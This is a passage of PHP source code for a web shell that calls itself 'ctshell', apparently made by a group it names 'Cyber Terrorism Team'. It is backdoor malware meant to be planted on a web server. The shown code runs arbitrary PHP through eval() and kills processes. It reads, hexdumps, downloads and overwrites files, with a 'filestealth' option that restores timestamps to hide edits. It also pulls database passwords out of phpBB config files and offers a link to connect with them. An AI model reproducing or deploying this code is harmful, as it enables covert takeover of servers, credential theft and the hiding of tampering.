  1751. unset($prcs[0]);
  1752. echo "<TABLE height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor=\"#C0C0C0\">";
  1753. echo "<tr border=\"1\">";
  1754. foreach ($head as $v) {echo "<td><b>&nbsp;&nbsp;&nbsp;".$v."</b>&nbsp;&nbsp;&nbsp;</td>";}
  1755. echo "</tr>";
  1756. foreach ($prcs as $line)
  1757. {
  1758. if (!empty($line))
  1759. {
  1760. echo "<tr>";
  1761. $line = explode(" ",$line);
  1762. $line[10] = join(" ",array_slice($line,10,count($line)));
  1763. $line = array_slice($line,0,11);
  1764. $line[] = "<a href=\"".$sul."act=ps_aux&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>";
  1765. foreach ($line as $v) {echo "<td>&nbsp;&nbsp;&nbsp;".$v."&nbsp;&nbsp;&nbsp;</td>";}
  1766. echo "</tr>";
  1767. }
  1768. }
  1769. echo "</table>";
  1770. }
  1771. }
  1772. }
  1773. if ($act == "eval")
  1774. {
  1775. if (!empty($eval))
  1776. {
  1777. echo "<b>Ðåçóëüòàò âûïîëíåíèÿ ýòîò PHP-êîä</b>:<br>";
  1778. $tmp = ob_get_contents();
  1779. $olddir = realpath(".");
  1780. @chdir($d);
  1781. if ($tmp)
  1782. {
  1783. ob_clean();
  1784. eval($eval);
  1785. $ret = ob_get_contents();
  1786. $ret = convert_cyr_string($ret,"d","w");
  1787. ob_clean();
  1788. echo $tmp;
  1789. if ($eval_txt)
  1790. {
  1791. $rows = count(explode("
  1792. ",$ret))+1;
  1793. if ($rows < 10) {$rows = 10;}
  1794. echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
  1795. }
  1796. else {echo $ret;}
  1797. }
  1798. else
  1799. {
  1800. if ($eval_txt)
  1801. {
  1802. echo "<br><textarea cols=\"122\" rows=\"15\" readonly>";
  1803. eval($eval);
  1804. echo "</textarea>";
  1805. }
  1806. else {echo $ret;}
  1807. }
  1808. @chdir($olddir);
  1809. }
  1810. else {echo "<b>PHP-êîä âûïîëíåíèÿ</b>"; if (empty($eval_txt)) {$eval_txt = true;}}
  1811. echo "<form method=\"POST\"><textarea name=\"eval\" cols=\"122\" rows=\"10\">".htmlspecialchars($eval)."</textarea><input type=\"hidden\" name=\"eval_txt\" value=\"1\""; if ($eval_txt) {echo " checked";} echo "><input type=\"hidden\" name=\"d\" value=\"".$dispd."\"><br><br><input type=\"submit\" value=\"Âûïîëíèòü\"></form>";
  1812. }
  1813. if ($act == "f")
  1814. {
  1815. $r = @file_get_contents($d.$f);
  1816. if (!is_readable($d.$f) and $ft != "edit")
  1817. {
  1818. if (file_exists($d.$f)) {echo "<center><b>Permision denied (".htmlspecialchars($d.$f).")!</b></center>";}
  1819. else {echo "<center><b>File does not exists (".htmlspecialchars($d.$f).")!</b><br><a href=\"".$sul."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."&c=1\"><u>Create</u></a></center>";}
  1820. }
  1821. else
  1822. {
  1823. $ext = explode(".",$f);
  1824. $c = count($ext)-1;
  1825. $ext = $ext[$c];
  1826. $ext = strtolower($ext);
  1827. $rft = "";
  1828. foreach($ftypes as $k=>$v)
  1829. {
  1830. if (in_array($ext,$v)) {$rft = $k; break;}
  1831. }
  1832. if (eregi("sess_(.*)",$f)) {$rft = "phpsess";}
  1833. if (empty($ft)) {$ft = $rft;}
  1834. echo "<b>Ðàññìîòðåíèå ôàéëà:&nbsp;&nbsp;&nbsp;&nbsp;<img src=\"".$sul."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;".$f." (".view_size(filesize($d.$f)).") &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;";
  1835. if (is_writable($d.$f)) {echo "<font color=\"green\">Ïîëíûé äîñòóï ÷òåíèÿ/çàïèñè (".view_perms(fileperms($d.$f)).")</font>";}
  1836. else {echo "<font color=\"red\">Read-Only (".view_perms(fileperms($d.$f)).")</font>";}
  1837. echo "<hr size=\"1\" noshade>";
  1838. if ($ft == "info")
  1839. {
  1840. echo "<b>Information:</b>";
  1841. echo "<table class=tab border=0 cellspacing=1 cellpadding=2>";
  1842. echo "<tr class=tr><td><b>Size</b></td><td> ".view_size(filesize($d.$f))."</td></tr>";
  1843. echo "<tr class=tr><td><b>MD5</b></td><td> ".md5_file($d.$f)."</td></tr>";
  1844. if (!$win)
  1845. {
  1846. echo "<tr class=tr><td><b>Owner/Group</b></td><td> ";
  1847. $tmp=posix_getpwuid(fileowner($d.$f));
  1848. if (!isset($tmp['name']) || $tmp['name']=="") echo fileowner($d.$f)." ";
  1849. else echo $tmp['name']." ";
  1850. $tmp=posix_getgrgid(filegroup($d.$f));
  1851. if (!isset($tmp['name']) || $tmp['name']=="") echo filegroup($d.$f);
  1852. else echo $tmp['name'];
  1853. }
  1854. echo "<tr class=tr><td><b>Perms</b></td><td>";
  1855. if (is_writable($d.$f))
  1856. {
  1857. echo "<font color=\"green\">".view_perms(fileperms($d.$f))."</font>";
  1858. }
  1859. else
  1860. {
  1861. echo "<font>".view_perms(fileperms($d.$f))."</font>";
  1862. }
  1863. echo "</td></tr>";
  1864. echo "<tr class=tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr>";
  1865. echo "<tr class=tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr>";
  1866. echo "<tr class=tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr>";
  1867. echo "</table><br>";
  1868. $fi = fopen($d.$f,"rb");
  1869. if ($fi)
  1870. {
  1871. if ($fullhexdump)
  1872. {
  1873. echo "<b>FULL HEXDUMP</b>";
  1874. $str=fread($fi,filesize($d.$f));
  1875. }
  1876. else
  1877. {
  1878. echo "<b>HEXDUMP PREVIEW</b>";
  1879. $str=fread($fi,$hexdump_lines*$hexdump_rows);
  1880. }
  1881. $n=0;
  1882. $a0="00000000<br>";
  1883. $a1="";
  1884. $a2="";
  1885. for ($i=0; $i<strlen($str); $i++)
  1886. {
  1887. $a1.=sprintf("%02X",ord($str[$i])).' ';
  1888. switch (ord($str[$i]))
  1889. {
  1890. case 0: $a2.="<font class=s2>0</font>"; break;
  1891. case 32:
  1892. case 10:
  1893. case 13: $a2.="&nbsp;"; break;
  1894. default: $a2.=htmlspecialchars($str[$i]);
  1895. }
  1896. $n++;
  1897. if ($n == $hexdump_rows)
  1898. {
  1899. $n = 0;
  1900. if ($i+1<strlen($str)) {$a0.=sprintf("%08X",$i+1)."<br>";}
  1901. $a1.="<br>";
  1902. $a2.="<br>";
  1903. }
  1904. }
  1905. echo "<table border=0 bgcolor=#666666 cellspacing=1 cellpadding=4 ".
  1906. "class=sy><tr><td bgcolor=#666666> $a0</td><td bgcolor=000000>".
  1907. "$a1</td><td bgcolor=000000>$a2</td></tr></table><br>";
  1908. }
  1909. $encoded = "";
  1910. if ($base64 == 1)
  1911. {
  1912. echo "<b>Base64 Encode</b><br>";
  1913. $encoded = base64_encode($r);
  1914. }
  1915. elseif($base64 == 2)
  1916. {
  1917. echo "<b>Base64 Encode + Chunk</b><br>";
  1918. $encoded = chunk_split(base64_encode($r));
  1919. }
  1920. elseif($base64 == 3)
  1921. {
  1922. echo "<b>Base64 Encode + Chunk + Quotes</b><br>";
  1923. $encoded = base64_encode($r);
  1924. $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2);
  1925. }
  1926. elseif($base64 == 4)
  1927. {
  1928. }
  1929. if (!empty($encoded))
  1930. {
  1931. echo "<textarea cols=80 rows=10>".htmlspecialchars($encoded)."</textarea><br><br>";
  1932. }
  1933. echo "<b>HEXDUMP:</b><nobr> [<a href=\"".$sul."act=f&f=".urlencode($f)."&ft=info&fullhexdump=1&d=".urlencode($d)."\">Full</a>] [<a href=\"".$sul."act=f&f=".urlencode($f)."&ft=info&d=".urlencode($d)."\">Preview</a>]<br><b>Base64: </b>
  1934. <nobr>[<a href=\"".$sul."act=f&f=".urlencode($f)."&ft=info&base64=1&d=".urlencode($d)."\">Encode</a>]&nbsp;</nobr>
  1935. <nobr>[<a href=\"".$sul."act=f&f=".urlencode($f)."&ft=info&base64=2&d=".urlencode($d)."\">+chunk</a>]&nbsp;</nobr>
  1936. <nobr>[<a href=\"".$sul."act=f&f=".urlencode($f)."&ft=info&base64=3&d=".urlencode($d)."\">+chunk+quotes</a>]&nbsp;</nobr>
  1937. <nobr>[<a href=\"".$sul."act=f&f=".urlencode($f)."&ft=info&base64=4&d=".urlencode($d)."\">Decode</a>]&nbsp;</nobr>
  1938. <P>";
  1939. }
  1940. elseif ($ft == "html")
  1941. {
  1942. if ($white) {@ob_clean();}
  1943. echo $r;
  1944. if ($white) {exit;}
  1945. }
  1946. elseif ($ft == "txt")
  1947. {
  1948. echo "<pre>".htmlspecialchars($r)."</pre>";
  1949. }
  1950. elseif ($ft == "ini")
  1951. {
  1952. echo "<pre>";
  1953. var_dump(parse_ini_file($d.$f,true));
  1954. echo "</pre>";
  1955. }
  1956. elseif ($ft == "phpsess")
  1957. {
  1958. echo "<pre>";
  1959. $v = explode("|",$r);
  1960. echo $v[0]."<br>";
  1961. var_dump(unserialize($v[1]));
  1962. echo "</pre>";
  1963. }
  1964. elseif ($ft == "exe")
  1965. {
  1966. echo "<form action=\"".$sul."act=cmd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"".htmlspecialchars($r)."\"><input type=\"submit\" name=\"submit\" value=\"Execute\">&nbsp;<input type=\"submit\" value=\"View&Edit command\"></form>";
  1967. }
  1968. elseif ($ft == "sdb")
  1969. {
  1970. echo "<pre>";
  1971. var_dump(unserialize(base64_decode($r)));
  1972. echo "</pre>";
  1973. }
  1974. elseif ($ft == "code")
  1975. {
  1976. if (ereg("phpBB 2.(.*) auto-generated config file",$r))
  1977. {
  1978. $arr = explode("
  1979. ",$r);
  1980. if (count($arr == 18))
  1981. {
  1982. include($d.$f);
  1983. echo "<b>phpBB configuration is detected in this file!<br>";
  1984. if ($dbms == "mysql4") {$dbms = "mysql";}
  1985. if ($dbms == "mysql") {echo "<a href=\"".$sul."act=sql&sql_server=".htmlspecialchars($dbhost)."&sql_login=".htmlspecialchars($dbuser)."&sql_passwd=".htmlspecialchars($dbpasswd)."\"><b><u>Connect to DB</u></b></a><br><br>";}
  1986. else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by ctshell";}
  1987. echo "Parameters for manual connect:<br>";
  1988. $cfgvars = array(
  1989. "dbms"=>$dbms,
  1990. "dbhost"=>$dbhost,
  1991. "dbname"=>$dbname,
  1992. "dbuser"=>$dbuser,
  1993. "dbpasswd"=>$dbpasswd
  1994. );
  1995. foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'<br>";}
  1996. echo "</b>";
  1997. echo "<hr size=\"1\" noshade>";
  1998. }
  1999. }
  2000. echo "<div style=\"border : 0px solid #FFFFFF; padding: 1em; margin-top: 1em; margin-bottom: 1em; margin-right: 1em; margin-left: 1em; background-color: #808080;\">";
  2001. if (!empty($white)) {@ob_clean();}
  2002. if ($rehtml) {$r = rehtmlspecialchars($r);}
  2003. $r = stripslashes($r);
  2004. $strip = false;
  2005. if(!strpos($r,"<?") && substr($r,0,2)!="<?") {$r="<?php\n".trim($r)."\n?>"; $r = trim($r); $strip = true;}
  2006. $r = @highlight_string($r, TRUE);
  2007. if ($delspace) {$buffer = str_replace ("&nbsp;", " ", $r);}
  2008. echo $r;
  2009. if (!empty($white)) {exit;}
  2010. echo "</div>";
  2011. }
  2012. elseif ($ft == "download")
  2013. {
  2014. @ob_clean();
  2015. header("Content-type: ctshell");
  2016. header("Content-disposition: attachment; filename=\"".$f."\";");
  2017. echo($r);
  2018. exit;
  2019. }
  2020. elseif ($ft == "notepad")
  2021. {
  2022. @ob_clean();
  2023. header("Content-type: text/plain");
  2024. header("Content-disposition: attachment; filename=\"".$f.".txt\";");
  2025. echo($r);
  2026. exit;
  2027. }
  2028. elseif ($ft == "img")
  2029. {
  2030. if (!$white)
  2031. {
  2032. echo "<center><img src=\"".$sul."act=f&f=".urlencode($f)."&ft=img&white=1&d=".urlencode($d)."\" border=\"1\"></center>";
  2033. }
  2034. else
  2035. {
  2036. @ob_clean();
  2037. $ext = explode($f,".");
  2038. $ext = $ext[count($ext)-1];
  2039. header("Content-type: image/gif");
  2040. echo($r);
  2041. exit;
  2042. }
  2043. }
  2044. elseif ($ft == "edit")
  2045. {
  2046. if (!empty($submit))
  2047. {
  2048. if ($filestealth) {$stat = stat($d.$f);}
  2049. if (!is_writable($d.$f) and $autochmod) {@chmod($d.$f,$autochmod);}
  2050. $fp = fopen($d.$f,"w");
  2051. if (!$fp) {echo "<b>Can't write to file!</b>";}
  2052. else
  2053. {
  2054. echo "<b>Ñîõðàí¸íü!!!</b>";
  2055. fwrite($fp,$nfcontent);
  2056. fclose($fp);
  2057. if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);}
  2058. $r = $nfcontent;
  2059. }
  2060. }
  2061. $rows = count(explode("
  2062. ",$r));
  2063. if ($rows < 10) {$rows = 10;}
  2064. if ($rows > 30) {$rows = 30;}
  2065. echo "<form method=\"POST\"><input type=\"submit\" name=\"submit\" value=\"Ñîõðàíèòü\">&nbsp;<input type=\"reset\" value=\"Ñáðîñ\">&nbsp;<br><textarea name=\"nfcontent\" cols=\"122\" rows=\"".$rows."\">".htmlspecialchars($r)."</textarea></form>";
  2066. }
  2067. elseif (!empty($ft)) {echo "<center><b>Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.</b></center>";}
  2068. else {echo "<center><b>Unknown extension (".$ext."), please, select type manually.</b></center>";}
  2069. }
  2070. }
  2071. if ($act == "phpinfo")
  2072. {
  2073. ob_end_clean();
  2074. phpinfo();
  2075. exit;
  2076. }
  2077. }
  2078. $data = base64_decode("PGNlbnRlcj48Zm9udCBzaXplPTIgY29sb3I9IzAwZmYwMD5DeWJlciBUZXJyb3Jpc20gVGVhbTwvZm9udD48YnI+PGZvbnQgc2l6ZT0yPg0KyOTl/ywg6Ofs5e3l7ej/IOTo5+Dp7eAg6CDx6vDo7/LgIOTu4eDi6Os6PC9mb250PjxpbWcgc3JjPWh0dHA6Ly9vbmxpbmUubWlyYWJpbGlzLmNvbS9zY3JpcHRzL29ubGluZS5kbGw/aWNxPTMzNTk3NjAyMSZpbWc9NSBoZWlnaHQ9MTggd2lkdGg9MTg+PGZvbnQgc2l6ZT0yIGNvbG9yPSNGRkRFMDA+IFJPRE5PQzwvZm9udD48L2NlbnRlcj4=");
  2079. if ($act == "img")
  2080. {
  2081. @ob_clean();
  2082. $arrimg = array(
  2083. "arrow_ltr"=>
  2084. "R0lGODlhJgAWAIAAAAAAAP///yH5BAUUAAEALAAAAAAmABYAAAIvjI+py+0PF4i0gVvzuVxXDnoQ".
  2085. "SIrUZGZoerKf28KjPNPOaku5RfZ+uQsKh8RiogAAOw==",
  2086. "back"=>
  2087. "R0lGODlhFAAUAKIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8".
  2088. "aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqt".
  2089. "Wg0JADs=",
  2090. "buffer"=>
  2091. "R0lGODlhFAAUAKIAAAAAAP////j4+N3d3czMzLKysoaGhv///yH5BAEAAAcALAAAAAAUABQAAANo".
  2092. "eLrcribG90y4F1Amu5+NhY2kxl2CMKwrQRSGuVjp4LmwDAWqiAGFXChg+xhnRB+ptLOhai1crEmD".
  2093. "Dlwv4cEC46mi2YgJQKaxsEGDFnnGwWDTEzj9jrPRdbhuG8Cr/2INZIOEhXsbDwkAOw==",
  2094. "change"=>
  2095. "R0lGODlhFAAUAMQfAL3hj7nX+pqo1ejy/f7YAcTb+8vh+6FtH56WZtvr/RAQEZecx9Ll/PX6/v3+".
  2096. "/3eHt6q88eHu/ZkfH3yVyIuQt+72/kOm99fo/P8AZm57rkGS4Hez6pil9oep3GZmZv///yH5BAEA".
  2097. "AB8ALAAAAAAUABQAAAWf4CeOZGme6NmtLOulX+c4TVNVQ7e9qFzfg4HFonkdJA5S54cbRAoFyEOC".
  2098. "wSiUtmYkkrgwOAeA5zrqaLldBiNMIJeD266XYTgQDm5Rx8mdG+oAbSYdaH4Ga3c8JBMJaXQGBQgA".
  2099. "CHkjE4aQkQ0AlSITan+ZAQqkiiQPj1AFAaMKEKYjD39QrKwKAa8nGQK8Agu/CxTCsCMexsfIxjDL".
  2100. "zMshADs=",
  2101. "delete"=>
  2102. "R0lGODlhFAAUAOZZAPz8/NPFyNgHLs0YOvPz8/b29sacpNXV1fX19cwXOfDw8Kenp/n5+etgeunp".
  2103. "6dcGLMMpRurq6pKSktvb2+/v7+1wh3R0dPnP17iAipxyel9fX7djcscSM93d3ZGRkeEsTevd4LCw".
  2104. "sGRkZGpOU+IfQ+EQNoh6fdIcPeHh4YWFhbJQYvLy8ui+xm5ubsxccOx8kcM4UtY9WeAdQYmJifWv".
  2105. "vHx8fMnJycM3Uf3v8rRue98ONbOzs9YFK5SUlKYoP+Tk5N0oSufn57ZGWsQrR9kIL5CQkOPj42Vl".
  2106. "ZeAPNudAX9sKMPv7+15QU5ubm39/f8e5u4xiatra2ubKz8PDw+pfee9/lMK0t81rfd8AKf///wAA".
  2107. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  2108. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5".
  2109. "BAEAAFkALAAAAAAUABQAAAesgFmCg4SFhoeIhiUfIImIMlgQB46GLAlYQkaFVVhSAIZLT5cbEYI4".
  2110. "STo5MxOfhQwBA1gYChckQBk1OwiIALACLkgxJilTBI69RFhDFh4HDJRZVFgPPFBR0FkNWDdMHA8G".
  2111. "BZTaMCISVgMC4IkVWCcaPSi96OqGNFhKI04dgr0QWFcKDL3A4uOIjVZZABxQIWDBLkIEQrRoQsHQ".
  2112. "jwVFHBgiEGQFIgQasYkcSbJQIAA7",
  2113. "download"=>
  2114. "R0lGODlhEQAPAKIAAO/v8N3e387OzpSt72NzrVFZfCkxUv///yH5BAUUAAcALAAAAAARAA8AAANSe".
  2115. "Grc3uoYAEq4wWZqFtWXVnBehWUhKQ1V4b6uagwsZd/ATO84ru+0k/C3MxCOSIyDZhQ4nYRnZ2UQRJ9".
  2116. "W6aKaxV4F02r1CwWDF2bYyzyVPN6dBAA7",
  2117. "edit"=>
  2118. "R0lGODlhFAAUALMAAAAAAP///93d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAAAAAAAAAAAAAA".
  2119. "AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze".
  2120. "EQYQLUAsGgM0Wwt3bCJfQSFx10yyBlJn8RfEMgM9X+3qHWq5iED5yCsMCl111knDpuXfYls+IK61".
  2121. "LXd+WWEHLUd/ToJFZQOOj5CRjiCBlZaXIBEAOw==",
  2122. "forward"=>
  2123. "R0lGODlhFAAUAPIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8".
  2124. "aLrc/jDK2Qp9xV5WiN5G50FZaRLD6IhE66Lpt3RDbd9CQFSE4P++QW7He7UKPh0IqVw2l0RQSEqt".
  2125. "WqsJADs=",
  2126. "home"=>
  2127. "R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzLKysoaGhmZmZgQEBP///wAAAAAAAAAAAAAAAAAA".
  2128. "AAAAACH5BAEAAAkALAAAAAAUABQAAAR+MMk5TTWI6ipyMoO3cUWRgeJoCCaLoKO0mq0ZxjNSBDWS".
  2129. "krqAsLfJ7YQBl4tiRCYFSpPMdRRCoQOiL4i8CgZgk09WfWLBYZHB6UWjCequwEDHuOEVK3QtgN/j".
  2130. "VwMrBDZvgF+ChHaGeYiCBQYHCH8VBJaWdAeSl5YiW5+goBIRADs=",
  2131. "mode"=>
  2132. "R0lGODlhHQAUALMAAAAAAP///6CgpN3d3czMzIaGhmZmZl9fX////wAAAAAAAAAAAAAAAAAAAAAA".
  2133. "AAAAACH5BAEAAAgALAAAAAAdABQAAASBEMlJq70461m6/+AHZMUgnGiqniNWHHAsz3F7FUGu73xO".
  2134. "2BZcwGDoEXk/Uq4ICACeQ6fzmXTlns0ddle99b7cFvYpER55Z10Xy1lKt8wpoIsACrdaqBpYEYK/".
  2135. "dH1LRWiEe0pRTXBvVHwUd3o6eD6OHASXmJmamJUSY5+gnxujpBIRADs=",
  2136. "refresh"=>
  2137. "R0lGODlhEQAUALMAAAAAAP////Hx8erq6uPj493d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAA".
  2138. "AAAAACH5BAEAAAwALAAAAAARABQAAAR1kMlJq0Q460xR+GAoIMvkheIYlMyJBkJ8lm6YxMKi6zWY".
  2139. "3AKCYbjo/Y4EQqFgKIYUh8EvuWQ6PwPFQJpULpunrXZLrYKx20G3oDA7093Esv19q5O/woFu9ZAJ".
  2140. "R3lufmWCVX13h3KHfWWMjGBDkpOUTTuXmJgRADs=",
  2141. "search"=>
  2142. "R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzMDAwLKysoaGhnd3d2ZmZl9fX01NTSkpKQQEBP//".
  2143. "/wAAACH5BAEAAA4ALAAAAAAUABQAAASn0Ml5qj0z5xr6+JZGeUZpHIqRNOIRfIYiy+a6vcOpHOap".
  2144. "s5IKQccz8XgK4EGgQqWMvkrSscylhoaFVmuZLgUDAnZxEBMODSnrkhiSCZ4CGrUWMA+LLDxuSHsD".
  2145. "AkN4C3sfBX10VHaBJ4QfA4eIU4pijQcFmCVoNkFlggcMRScNSUCdJyhoDasNZ5MTDVsXBwlviRmr".
  2146. "Cbq7C6sIrqawrKwTv68iyA6rDhEAOw==",
  2147. "setup"=>
  2148. "R0lGODlhFAAUAMQAAAAAAP////j4+OPj493d3czMzMDAwLKyspaWloaGhnd3d2ZmZl9fX01NTUJC".
  2149. "QhwcHP///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA".
  2150. "ABAALAAAAAAUABQAAAWVICSKikKWaDmuShCUbjzMwEoGhVvsfHEENRYOgegljkeg0PF4KBIFRMIB".
  2151. "qCaCJ4eIGQVoIVWsTfQoXMfoUfmMZrgZ2GNDPGII7gJDLYErwG1vgW8CCQtzgHiJAnaFhyt2dwQE".
  2152. "OwcMZoZ0kJKUlZeOdQKbPgedjZmhnAcJlqaIqUesmIikpEixnyJhulUMhg24aSO6YyEAOw==",
  2153. "small_dir"=>
  2154. "R0lGODlhDgAQALMPAKt5E8uYM7SBHLyJJMaTLsGOKaRyDJ5sBv/MZ//////ge//rhf/Ub//3kf//m".
  2155. "f///yH5BAEAAA8ALAAAAAAOABAAAARF8MlJq704axo6yUEiJsUVOqiTDIPgSkEjz6MIPMGi7/xyE4q".
  2156. "gcKj4MY7IJONWQDifUAQzSr0NqFErFnp7uASAsMFwKD8iADs=",
  2157. "small_unk"=>
  2158. "R0lGODlhEQAUANUhAOXl1c3MzJiYmCkufnoRE83MzTNOoszLzO4jI/HqQIeGh5iYlxZ7PRh8PXLM".
  2159. "2FRVVMvLyzRNofbHPnsRE+bm1QgJCebl1FRUVFVVVIaGh1VVVQcICCoufoaFhYWGhszMzP///wAA".
  2160. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  2161. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEAACEALAAAAAARABQAAAaewJBw".
  2162. "SCwaj0hPZpnxOD2dhdFDsVgBV4tAU+yAvmCwAHQhesNhwQVTFnoVS2gn0/FsIJiht8ORcP4DfxVk".
  2163. "QxkgfIF/gBuEQh6HaF8WjHmOIIYJBF8GIBSUQ49eBAggBg4RniBclo8gE18MDQCDqyGhAFUUuLi0".
  2164. "oCAbFRvAwcCMtWeRYW0hGQcfAc/QBQEFzpUhbBoaGNsP2mtrSOLjSEEAOw==",
  2165. "sort_asc"=>
  2166. "R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMa".
  2167. "SLrcPcE9GKUaQlQ5sN5PloFLJ35OoK6q5SYAOw==",
  2168. "sort_desc"=>
  2169. "R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMb".
  2170. "SLrcOjBCB4UVITgyLt5ch2mgSJZDBi7p6hIJADs=",
  2171. "sql_button_drop"=>
  2172. "R0lGODlhCQALAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/".
  2173. "/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  2174. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm".
  2175. "AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/".
  2176. "MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm".
  2177. "ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/".
  2178. "mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm".
  2179. "zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/".
  2180. "/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ".
  2181. "AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA".
  2182. "M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ".
  2183. "ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A".
  2184. "mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z".
  2185. "zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAsA".
  2186. "AAg4AP8JREFQ4D+CCBOi4MawITeFCg/iQhEPxcSBlFCoQ5Fx4MSKv1BgRGGMo0iJFC2ehHjSoMt/".
  2187. "AQEAOw==",
  2188. "sql_button_empty"=>
  2189. "R0lGODlhCQAKAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/".
  2190. "/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  2191. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm".
  2192. "AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/".
  2193. "MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm".
  2194. "ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/".
  2195. "mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm".
  2196. "zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/".
  2197. "/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ".
  2198. "AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA".
  2199. "M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ".
  2200. "ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A".
  2201. "mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z".
